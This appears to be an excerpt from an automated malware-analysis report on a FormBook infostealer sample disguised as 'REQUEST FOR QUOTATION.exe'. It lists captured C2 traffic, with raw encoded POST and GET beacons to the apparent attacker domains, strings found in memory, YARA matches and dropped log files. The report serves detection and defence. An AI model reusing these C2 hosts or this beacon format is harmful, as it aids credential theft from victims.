            Source: global trafficHTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeContent-Length: 170935Cache-Control: no-cacheOrigin: http://www.internationalsoccerteams.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.internationalsoccerteams.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 69 35 51 55 33 6e 74 44 39 50 4b 52 4d 4d 73 4e 47 51 44 6b 5f 5a 53 35 4b 59 5a 76 42 6a 76 7a 65 4a 79 65 69 4e 77 53 73 46 38 7e 74 4b 63 6c 2d 7e 73 46 2d 47 76 58 4d 72 5a 73 6d 38 55 67 53 51 4e 76 76 30 4c 51 68 76 58 55 44 36 71 36 7a 52 45 63 31 62 76 76 45 28 58 31 46 69 54 70 64 32 4f 64 68 7e 74 68 61 6b 78 33 75 6d 6c 70 48 79 65 6f 57 49 61 61 6e 32 45 31 62 64 54 51 42 54 61 4b 31 6a 55 46 4b 4f 4d 7e 79 75 4a 42 78 51 55 54 71 49 4b 64 59 67 58 39 33 61 32 28 4a 33 67 33 5a 46 57 54 4c 76 6b 68 66 51 52 51 4e 5a 32 45 35 44 4f 63 35 4f 59 33 35 64 63 70 4e 61 35 6d 35 73 73 7a 65 72 74 28 5f 72 37 52 31 43 66 4c 37 61 7a 66 4c 38 34 66 62 50 74 6d 7a 6d 5a 61 7a 75 79 6f 54 68 5a 39 51 67 64 75 4b 39 4e 76 4c 38 44 38 4e 32 6c 49 61 77 35 49 30 6e 35 36 63 78 52 5a 79 49 64 57 35 30 64 75 50 77 63 45 57 6c 66 62 6b 33 68 34 67 61 2d 57 74 54 33 4b 79 33 6c 62 52 34 59 4d 6d 70 58 76 70 34 34 52 66 6e 4b 78 6d 53 5f 4f 68 6f 4a 6d 33 52 50 6e 71 51 39 44 66 66 32 76 66 55 54 4d 76 58 4a 39 5f 72 4f 6d 30 33 70 7e 69 52 53 71 32 4c 4e 48 6a 78 2d 39 56 4c 63 39 59 6f 55 6e 43 79 77 75 74 4f 7a 6e 47 38 4b 57 55 77 79 41 51 62 67 4b 45 74 48 6f 47 35 52 36 5f 44 35 52 54 28 45 74 62 65 6f 5a 41 6f 77 42 4b 68 35 58 78 44 43 78 57 77 6d 4b 33 50 56 46 45 4d 47 50 6c 42 71 4b 54 38 78 68 7a 70 45 6a 69 32 4d 54 31 77 6d 61 4a 74 6b 56 53 62 61 6b 6b 47 49 57 31 63 65 31 49 71 56 78 50 6b 50 43 71 5a 41 30 68 6d 37 46 41 56 67 72 6f 61 76 62 73 35 71 73 56 72 43 4c 4a 71 47 74 75 4b 65 5a 45 71 77 73 59 50 77 59 59 52 7a 35 49 76 56 55 41 6f 63 70 52 6a 56 49 49 37 2d 63 31 28 4d 66 48 54 4e 62 63 74 5a 5a 70 62 59 51 59 43 35 78 43 4c 58 57 34 6e 5f 34 79 6c 36 67 67 39 4d 50 5f 4a 4d 73 57 41 54 37 75 5a 6f 6a 59 55 64 6b 36 74 78 39 47 7a 6e 7e 31 68 38 7a 57 45 38 61 63 49 4c 73 73 46 6a 33 69 4a 79 35 69 34 59 52 7a 41 36 72 37 55 75 31 38 49 56 62 70 75 43 56 65 47 39 70 6c 63 36 45 52 61 79 79 57 63 63 4d 57 39 68 69 38 55 67 36 62 28 75 4c 54 6a 50 36 51 77 78 58 77 6d 34 45 61 54 70 76 70 44 72 34 49 32 31 33 6d 36 36 33 64 69 74 56 31 48 32 6e 64 61 68 35 5f 61 58 58 6a 46 4d 52 47 34 37 36 64 50 6e 6e 6c 4e 58 6d 68 79 4d 53 52 4f 48 65 51 39 6c 6d 6f 75 5f 74 4a 38 6e 55 77 4e 4e 4b 2d 76 61 64 59 73 4f 52 4f 43 63 30 71 53 38 58 39 57 65 36 33 7e 69 36 52 38 65 28 36 59 55 62 6e 69 49 31 37 4a 44 66 51 28 5f 4c 75 5a 71 56 36 38 76 65 34 56 37 70 33 74 58 35 6f 6e 4f 62 76 37 4d 59 6f 4c 34 37 4a 65 77 6a 33 31 42 55 4b 44 52 51 46 38 46 36 7a 71 57 42 63 4f 57 4
            Source: global trafficHTTP traffic detected: GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.premiumnetworkstore.com
            Source: unknownHTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.premiumnetworkstore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.premiumnetworkstore.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 48 4b 75 4d 38 52 58 33 7a 51 43 57 38 4b 57 42 56 77 68 45 79 70 36 34 56 62 30 50 68 36 76 52 48 6a 46 63 68 30 61 30 49 67 71 34 58 67 46 79 7a 6e 30 6f 4b 6e 30 68 66 6c 58 53 4f 6d 35 49 51 46 50 6d 79 64 61 45 43 47 6f 53 41 48 62 70 35 31 4b 70 50 4b 31 49 34 4a 44 34 6e 42 59 53 4c 55 39 59 59 34 49 53 49 76 5a 31 38 61 6a 54 68 6e 31 58 76 41 57 56 69 47 4d 39 5a 37 63 42 45 73 50 49 43 53 4b 6c 44 72 51 46 6b 58 66 70 69 65 35 50 63 43 49 52 64 42 48 5a 52 4b 34 52 4d 42 41 32 6f 78 63 72 50 47 72 62 58 30 6f 54 57 61 4d 54 37 67 6b 32 34 4f 66 71 52 55 5f 44 47 42 35 67 56 42 42 65 65 35 48 42 6a 64 39 75 4a 77 72 64 6b 50 74 7a 54 46 31 43 76 71 38 28 55 39 4e 51 61 38 72 32 63 56 37 62 6f 39 44 59 74 4f 67 4c 55 44 61 4f 66 74 6e 57 58 72 4b 4d 49 37 35 6f 32 5a 72 4c 32 71 6c 77 67 69 4a 67 70 7a 61 69 51 42 78 6e 42 50 54 71 55 6d 71 65 4a 4a 4c 57 48 6f 4e 4e 67 6a 78 77 71 63 4e 38 71 55 4d 38 49 33 43 58 74 34 70 64 51 51 7a 5a 6d 64 6d 45 31 51 68 66 78 6a 76 33 30 75 44 30 59 4d 76 5a 64 70 5f 4c 52 7a 66 65 76 5a 55 53 55 4c 7a 55 30 6b 51 71 63 55 43 50 5f 58 6a 77 5f 31 31 53 45 36 6c 67 54 65 71 33 44 55 6c 77 4b 4d 74 78 30 67 7a 6f 75 6c 70 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=SeNfaHKuM8RX3zQCW8KWBVwhEyp64Vb0Ph6vRHjFch0a0Igq4XgFyzn0oKn0hflXSOm5IQFPmydaECGoSAHbp51KpPK1I4JD4nBYSLU9YY4ISIvZ18ajThn1XvAWViGM9Z7cBEsPICSKlDrQFkXfpie5PcCIRdBHZRK4RMBA2oxcrPGrbX0oTWaMT7gk24OfqRU_DGB5gVBBee5HBjd9uJwrdkPtzTF1Cvq8(U9NQa8r2cV7bo9DYtOgLUDaOftnWXrKMI75o2ZrL2qlwgiJgpzaiQBxnBPTqUmqeJJLWHoNNgjxwqcN8qUM8I3CXt4pdQQzZmdmE1Qhfxjv30uD0YMvZdp_LRzfevZUSULzU0kQqcUCP_Xjw_11SE6lgTeq3DUlwKMtx0gzoulpng).
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000006.00000000.673000917.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/10_Best_Mutual_Funds.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/Anti_Wrinkle_Creams.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/Best_Mortgage_Rates.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/Cheap_Air_Tickets.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxTH
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/Free_Credit_Report.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/Migraine_Pain_Relief.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/Top_10_Luxury_Cars.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/__media__/js/trademark.php?d=internationalsoccerteams.com&ty
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/display.cfm
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/px.js?ch=1
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/px.js?ch=2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/sk-logabpstatus.php?a=UXhYSEV0T2dld2lXQUFVUld2WTU5ZWZmL2YvN0
            Source: systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/xxg/
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: http://www.internationalsoccerteams.com/xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh0
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=16
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmpString found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=internationalsoccerteams.co

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Detected FormBook malwareShow sources
            Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogri.iniJump to dropped file
            Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogrv.iniJump to dropped file
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
